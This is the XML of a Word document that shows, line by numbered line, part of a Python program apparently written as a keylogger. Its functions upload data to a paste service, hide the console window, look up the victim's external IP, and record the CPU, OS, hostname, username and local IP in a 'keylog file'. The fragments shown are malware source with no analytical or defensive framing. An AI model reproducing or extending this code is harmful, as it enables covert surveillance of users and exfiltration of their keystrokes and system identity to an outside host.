    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="728" w:name="l381"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">381  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="728"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># HTTP post request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="729" w:name="l382"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">382  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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a llamar: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service_url</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="730" w:name="l383"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">383  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="730"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">req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paste_service_url</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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31" w:name="l384"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">384  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="731"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="732" w:name="l385"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">385  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="732"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Get url of file pasted from API response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="733" w:name="l386"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">386  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="733"/>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11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>req</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34" w:name="l387"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">387  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="73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of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file_pasted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="735" w:name="l388"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">388  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="735"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="736" w:name="l389"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">389  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="736"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>url_file_pasted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="737" w:name="l390"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">390  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="737"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="738" w:name="l391"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">391  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="739" w:name="l392"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">392  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="739"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Hide the application window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="740" w:name="l393"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">393  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="740"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>hide_conso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41" w:name="l394"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">394  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="741"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">window </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>win32console</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>GetConsoleWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="742" w:name="l395"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">395  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="742"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>win32gui</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ShowWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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743" w:name="l396"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">396  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="74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Oculta consola'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="744" w:name="l397"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">397  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="744"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="745" w:name="l398"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">398  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="745"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="746" w:name="l399"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">399  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="746"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Get the external ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="747" w:name="l400"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">400  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="747"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>get_external_ip</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48" w:name="l401"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">401  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="748"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">service_url </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'https://ident.me'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="749" w:name="l402"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">402  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="749"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">external_ip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service_url</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50" w:name="l403"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">403  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="75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IP Wan {} '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>external_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="751" w:name="l404"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">404  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="751"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>external_ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="752" w:name="l405"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">405  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="752"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="753" w:name="l406"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">406  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="753"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="754" w:name="l407"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">407  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="754"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Add initial system information to the keylog file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="755" w:name="l408"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">408  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="755"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>register_system_info</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56" w:name="l409"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">409  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="756"/>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57" w:name="l410"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">410  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="757"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="758" w:name="l411"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">411  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="75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BEGI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9" w:name="l412"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">412  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="75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pu=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">cpu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0" w:name="l413"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">413  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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os=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">operating_syste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1" w:name="l414"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">414  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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hostname=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">host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2" w:name="l415"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">415  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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username=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>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3" w:name="l416"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">416  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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localip=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">loc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4" w:name="l417"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
